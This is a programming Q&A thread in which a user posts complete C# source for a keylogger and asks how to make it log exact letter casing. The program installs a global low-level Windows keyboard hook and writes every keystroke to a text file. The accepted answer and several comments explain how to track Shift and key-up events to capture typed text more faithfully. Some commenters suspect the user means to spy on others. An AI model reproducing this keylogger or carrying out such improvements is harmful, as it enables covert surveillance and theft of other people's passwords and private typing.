# Help modifying a Keylogger application

Tags: c#

I got this application from the internet and I want to add some modifications. Unfortunately, I don't know what to do. This application is a simple Keylogger that saves the log in a text file.

*After reading the text file after the keylogging occurred, i noticed it had the words all in Upper Case, and for punctuation such as SPACE or ENTER, the word space and enter was used.

Can anyone please modify the code to save the exact casing of the character? I can't fairly understand the code.... thanks.

**Form1.cs**

```
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using System.IO;
using Utilities;

namespace Key_Logger
{
    /// <summary>
    /// Summary description for Form1.
    /// </summary>
    public class Form1 : System.Windows.Forms.Form
    {
        private System.Windows.Forms.ListBox listBox1;
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.Container components = null;

        globalKeyboardHook gkh = new globalKeyboardHook();
        private void HookAll()
        {
            foreach (object key in Enum.GetValues(typeof(Keys)))
            {

                gkh.HookedKeys.Add((Keys)key);
            }
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            gkh.KeyDown += new KeyEventHandler(gkh_KeyDown);
            HookAll();
            if (File.Exists(@"Keylogger.txt"))
            {
                File.Delete(@"Keylogger.txt");
            }
        }
        void gkh_KeyDown(object sender, KeyEventArgs e)
        {
            StreamWriter SW = new StreamWriter(@"Keylogger.txt", true);
            SW.Write(e.KeyCode);
            SW.Close();
        }

        public Form1()
        {
            //
            // Required for Windows Form Designer support
            //
            InitializeComponent();

            //
            // TODO: Add any constructor code after InitializeComponent call
            //
        }

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        protected override void Dispose( bool disposing )
        {
            if( disposing )
            {
                if (components != null) 
                {
                    components.Dispose();
                }
            }
            base.Dispose( disposing );
        }

        //Windows Form Designer generated code


        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        static void Main() 
        {
            Application.Run(new Form1());
        }

    }
}
```

**globalKeyboardHook.cs**

```
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace Utilities {
    /// <summary>
    /// A class that manages a global low level keyboard hook
    /// </summary>
    class globalKeyboardHook {
        #region Constant, Structure and Delegate Definitions
        /// <summary>
        /// defines the callback type for the hook
        /// </summary>
        public delegate int keyboardHookProc(int code, int wParam, ref keyboardHookStruct lParam);

        public struct keyboardHookStruct {
            public int vkCode;
            public int scanCode;
            public int flags;
            public int time;
            public int dwExtraInfo;
        }

        public bool _hookAll = false;
        public bool HookAllKeys
        {
            get
            {
                return _hookAll;
            }
            set
            {
                _hookAll = value;
            }
        }
        const int WH_KEYBOARD_LL = 13;
        const int WM_KEYDOWN = 0x100;
        const int WM_KEYUP = 0x101;
        const int WM_SYSKEYDOWN = 0x104;
        const int WM_SYSKEYUP = 0x105;
        #endregion

        #region Instance Variables
        /// <summary>
        /// The collections of keys to watch for
        /// </summary>
        public List<Keys> HookedKeys = new List<Keys>();
        /// <summary>
        /// Handle to the hook, need this to unhook and call the next hook
        /// </summary>
        IntPtr hhook = IntPtr.Zero;
        keyboardHookProc khp; 
        #endregion

        #region Events
        /// <summary>
        /// Occurs when one of the hooked keys is pressed
        /// </summary>
        public event KeyEventHandler KeyDown;
        /// <summary>
        /// Occurs when one of the hooked keys is released
        /// </summary>
        public event KeyEventHandler KeyUp;
        #endregion

        #region Constructors and Destructors
        /// <summary>
        /// Initializes a new instance of the <see cref="globalKeyboardHook"/> class and installs the keyboard hook.
        /// </summary>
        public globalKeyboardHook()
        {
            khp = new keyboardHookProc(hookProc);
            hook();
        }
        /// <summary>
        /// Releases unmanaged resources and performs other cleanup operations before the
        /// <see cref="globalKeyboardHook"/> is reclaimed by garbage collection and uninstalls the keyboard hook.
        /// </summary>
        ~globalKeyboardHook() {
            unhook();
        }
        #endregion

        #region Public Methods
        /// <summary>
        /// Installs the global hook
        /// </summary>
        public void hook()
        {
            IntPtr hInstance = LoadLibrary("User32");
            hhook = SetWindowsHookEx(WH_KEYBOARD_LL, khp, hInstance, 0);
        } 

        /// <summary>
        /// Uninstalls the global hook
        /// </summary>
        public void unhook() {
            UnhookWindowsHookEx(hhook);
        }

        /// <summary>
        /// The callback for the keyboard hook
        /// </summary>
        /// <param name="code">The hook code, if it isn't >= 0, the function shouldn't do anyting</param>
        /// <param name="wParam">The event type</param>
        /// <param name="lParam">The keyhook event information</param>
        /// <returns></returns>
        public int hookProc(int code, int wParam, ref keyboardHookStruct lParam) {
            if (code >= 0)
            {
                Keys key = (Keys)lParam.vkCode;
                if (_hookAll ? true : HookedKeys.Contains(key))
                {
                    KeyEventArgs kea = new KeyEventArgs(key);
                    if ((wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) && (KeyDown != null))
                    {
                        KeyDown(this, kea);
                    }
                    else if ((wParam == WM_KEYUP || wParam == WM_SYSKEYUP) && (KeyUp != null))
                    {
                        KeyUp(this, kea);
                    }
                    if (kea.Handled)
                        return 1;
                }
            }
            return CallNextHookEx(hhook, code, wParam, ref lParam);
        }

        #endregion

        #region DLL imports
        /// <summary>
        /// Sets the windows hook, do the desired event, one of hInstance or threadId must be non-null
        /// </summary>
        /// <param name="idHook">The id of the event you want to hook</param>
        /// <param name="callback">The callback.</param>
        /// <param name="hInstance">The handle you want to attach the event to, can be null</param>
        /// <param name="threadId">The thread you want to attach the event to, can be null</param>
        /// <returns>a handle to the desired hook</returns>
        [DllImport("user32.dll")]
        static extern IntPtr SetWindowsHookEx(int idHook, keyboardHookProc callback, IntPtr hInstance, uint threadId);

        /// <summary>
        /// Unhooks the windows hook.
        /// </summary>
        /// <param name="hInstance">The hook handle that was returned from SetWindowsHookEx</param>
        /// <returns>True if successful, false otherwise</returns>
        [DllImport("user32.dll")]
        static extern bool UnhookWindowsHookEx(IntPtr hInstance);

        /// <summary>
        /// Calls the next hook.
        /// </summary>
        /// <param name="idHook">The hook id</param>
        /// <param name="nCode">The hook code</param>
        /// <param name="wParam">The wparam.</param>
        /// <param name="lParam">The lparam.</param>
        /// <returns></returns>
        [DllImport("user32.dll")]
        static extern int CallNextHookEx(IntPtr idHook, int nCode, int wParam, ref keyboardHookStruct lParam);

        /// <summary>
        /// Loads the library.
        /// </summary>
        /// <param name="lpFileName">Name of the library</param>
        /// <returns>A handle to the library</returns>
        [DllImport("kernel32.dll")]
        static extern IntPtr LoadLibrary(string lpFileName);
        #endregion
    }
}
```

Comment: Evil application + wall of code == vote to close.

Comment: + completely generic and uninformative subject line...

Comment: I suggest that you study this application yourself and then ask questions for what **specific parts** of the application you do not understand. This is a Questions and Answers site, not a "heres some code, change it to work for me" site

Comment: I pondered changing the title to “I want to write a keylogger to spy on people, but I can’t figure out this code I downloaded from the Internet” but then I felt it would be a bit *too* mean.

Comment: @Tim don't assume that he has evil intentions with this.. though it is possible.

Comment: i understand the code..somehow. I just don't know how to get the right casing of the character

Answer (score 3, accepted):

The key-logger is doing just that: logging keystrokes. In Form1.Form1_Load, it's registering gkh_keyDown as the handler for every time a key is pressed. Importantly, there's no handler for when a key is released- there's nothing set to watch for the event gkh_keyUp. But the root GlobalKeyboardHook library does provide those events.

You'll need to write a new function (possibly gkh_keyUp) to handle keyUp events. That's the only way to know when anybody has let go of a shift key.

If all you care about is SHIFT+letters, and when Ctrl or Alt is released, you'll need to do the following:

- Add a `bool` for whether or not SHIFT is currently pressed.
- Set the flag whenever SHIFT is found to be the key on a Key Down event. Clear it whenever it's the key on Key Up.
- Whenever the key string is "SPACE", detect a space instead.
- If the SHIFT flag isn't set, use String.ToLower() when writing the key letter to the file; leave it as-is (in caps) if it's unset.
- If key-up receives Ctrl or Alt, make it print (-CTRL) or (-ALT) to represent the key being released. Other than changing the SHIFT flag, the key-up handler should probably be blank.

This isn't that big a rewrite, but rewriting it in place in this comment box felt like a bit much. Relevant things are that you don't need to change GlobalKeyboardHook.cs at all, and you should read the C# reference on events, event handling, and delegates to understand what's going on in Form1_Load, if you aren't sure how to register the key-up event.

Comment: What you described isn’t a big rewrite, but that’s because it doesn’t take into account things like `Shift` + `1` = `!` or `AltGr` + `e` = `é` or a Cyrillic keyboard or......

Comment: It's not a full solution, but it's a start. There's a wide variety of obscure cases to handle here, but going into detail for all of them probably wouldn't be the best thing to do. Here, the obvious points the way to the non-obvious. Good point especially about the numeric row, though; that will need the implementation of a lookup table.

Answer (score 1):

The important part is this line:

```
SW.Write(e.KeyCode);
```

Notice that `e.KeyCode` is of type `KeyCode` which is an enum. This enum has values such as `A` for the “A” key, `Space` for the spacebar, etc. Calling `SW.Write` with this will turn the enum value into a string containing its name and write that to the file.

Looks like your global keyboard hook does not provide any functionality to turn this KeyCode into an actual character. Implementing that is very hard: the character typed depends not only on what other keys are being pressed at the same time (e.g. Shift or AltGr), but also on the current keyboard layout. The user could have several different keyboard layouts installed and switch between them all the time.

Comment: i tried to use KeyChar but there's no such property for that event. how should be able to convert it?

Comment: If all we care about is uppercase/lowercase, we just need to track whether the shift key is being held or not. The easiest way to convert the keycode to a case is to go indirectly: e.KeyCode.ToString().ToLower(). The ToString() is implicitly being done by the Write anyway.

Comment: @Kistaro, and if the key actually *was* upper case, what then? Your code produces a wrong result.

Comment: @yonan, the code is hooking into the wrong event. Look at your other recent question. `KeyPress` is an event you want to look at it. I'm not going to be the one to tell you how to hook into it, although the answer is already in your code sample.

Comment: thank you very much to you all. :) I got some idea.

Comment: Well, that's for when and only when the case needs to be converted. I described the logic to detect that in my full answer. I was just showing how to do the conversion through String.